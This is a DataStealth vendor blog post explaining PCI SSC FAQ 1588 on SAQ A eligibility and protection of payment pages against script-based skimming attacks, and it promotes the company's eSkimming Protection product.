March 6, 2025
|
5
MIN Read

FAQ 1588: More Clarity on SAQ A Eligibility Changes

By
DataStealth

On 28 February 2025, the PCI Security Standards Council (SSC) released FAQ 1588 to clarify the new eligibility criteria it introduced for SAQ A merchants earlier in January

Under the new rules revealed in January, SAQ A merchants could mark PCI DSS requirements 6.4.3 and 11.6.1 as “Not Applicable” if they could “confirm that their site is not susceptible to attacks from scripts that could affect the merchant’s e-commerce system(s).”

However, the PCI SSC did not define what it meant by “site” or what constituted as evidence for showing one’s site or pages were “not susceptible” to script-based attacks. FAQ 1588 answers both of those important questions.

Understanding FAQ 1588

The FAQ clarifies how merchants using embedded payment forms or iframes from a third-party service provider (TPSP) or payment processor could prove that their payment pages are “not susceptible” to script-based attacks in one of the two following ways:

Using techniques such as, but not limited to, those detailed in PCI DSS Requirements 6.4.3 and 11.6.1 to protect the merchant’s webpage from scripts targeting account data. These techniques may be deployed by the merchant or a third party.

Or

Obtaining confirmation from the merchant’s PCI DSS compliant Third-Party Service Providers (TPSPs)/payment processor providing the embedded payment page/form(s) that, when implemented according to the TPSP’s/payment processor’s instructions, the TPSP’s/payment processor’s solution includes techniques that protect the merchant’s payment page from script attacks.

In short, FAQ 1588 states that merchants can meet the eligibility criteria if they confirm that their payment page(s) are not susceptible to script-based attacks by either:

  1. Deploying the security controls defined under requirements 6.4.3 and 11.6.1, or
  2. Obtaining confirmation from their TPSP that the payment page(s) with their iframe or embedded payment form is protected from script-based attacks. This would involve implementing a solution or specific techniques as required by the TPSP.

FAQ 1588 validates the recommendations we shared during our February 20th webinar. While the compliance requirements for SAQ A changed, the underlying security realities behind these requirements didn’t, and ignoring them risks costly breaches. 

In a sense, the PCI SSC changed the route, but the final destination is the same, i.e., every merchant must show they’re taking the threat of script-based attacks seriously. 

Option 1 - Implement Security Controls to Stop Script-Based Attacks

The first option requires merchants to implement and show security controls on their payment pages to mitigate the risk of script-based attacks. Merchants have the option of implementing the controls defined under requirements 6.4.3 and 11.6.1. 

This involves authorizing and justifying each script executed on the consumer’s browser (6.4.3) and monitoring for tampering and unauthorized changes in scripts and security-impacting HTTP headers (11.6.1). 

However, the PCI SSC’s wording suggests that other approaches are also acceptable, provided they demonstrate that your payment pages are protected against script-based attacks. 

Regardless of the approach, the FAQ confirms PCI DSS’ strong focus on protecting payment pages against script-based attacks, and is urging SAQ A merchants to adopt the best solutions or approaches available to protect themselves. 

A solution like DataStealth’s eSkimming Protection is an ideal fit in this context. It not only meets requirements 6.4.3 and 11.6.1 but also proactively safeguards your payment page against script-based attacks, including those employing advanced techniques and strategies.

For example, while some solutions can block some scripts from executing, DataStealth’s eSkimming Protection ensures that no unauthorized scripts ever reach the consumer’s browser. This keeps you in control of compliance and security, rather than relying on an unmanaged browser running on an unknown device and operated by a consumer you can’t control.

It operates in-line with traffic scanning every script on the payment page to detect and block unauthorized changes, such as malicious code injections, before they can affect consumers or compromise sensitive data. 

Moreover, this is simply one among many differentiating capabilities of DataStealth’s eSkimming Protection solution. Not only does it proactively protect you from script-based attacks, but it also streamlines your compliance workload by automating script authorization, script integrity checks and continuous monitoring of scripts and security-impacting HTTP headers. 

Option 2 - Get a Confirmation from Your TPSP

The second option transfers the compliance burden to the TPSP/payment processors. It seems that the PCI SSC is providing this option to help smaller merchants reduce their PCI DSS compliance obligations. 

The rules for this process are unclear, particularly regarding which “solutions” or “techniques” the PCI SSC considers acceptable. Additionally, it is uncertain whether TPSPs will be ready or willing to provide these confirmations, as doing so could make them accountable for their customers' compliance and security. 

Currently, many TPSPs may be unprepared to offer such assurances due to the lack of clear guidelines or insufficient internal resources to manage the responsibility.

That said, service providers interested in engaging in this service can explore using DataStealth solutions, such as eSkimming Protection and others, to secure both their own and their clients’ payment environments.

How Does this Impact Merchants Interested in Shifting to SAQ A?

FAQ 1588 clarifies one key point: Merchants interested in moving to SAQ A should still prioritize requirements 6.4.3 and 11.6.1. Moving from SAQ D or SAQ A-EP to SAQ A will take time and is a great long-term move to reducing your compliance burden. 

Unfortunately, it can’t be done within the 16 business days left (as of this article being published) until the March 31st enforcement deadline. However, by meeting requirements 6.4.3 and 11.6.1 today, you will be in a perfect spot to meet your future SAQ A compliance requirements.

Next Steps

  • Don’t wait for TPSPs to figure it out! Take control of your compliance today.
  • If you are a SAQ D or SAQ A-EP merchant, focus on meeting requirements 6.4.3 and 11.6.1.
  • Schedule a demo with DataStealth to see how eSkimming Protection can secure your payment pages.

Most Recent Blog Articles:
View All -->
Company
HomeISP Services
Project RescueAbout UsContact
Site Map
HomeAboutSupportBlogQSA Partner Program
Solutions
Data Discovery and Classification
Dynamic Data Masking
Data TokenizationTest Data Management
PCI Audit Scope Reduction
PCI Tamper Detection and Protection
Compliance to Requirements
6.4.3 and 11.6.1
Contact
info@datastealth.io
+1 (855) 553-2839
DataStealth Inc.
5995 Avebury Rd
Suite 600
Mississauga ON L5R 3P9
Follow us
InstagramTwitterLinkedinFacebook

©  2025  DataStealth Inc. All Rights Reserved.

Privacy Policy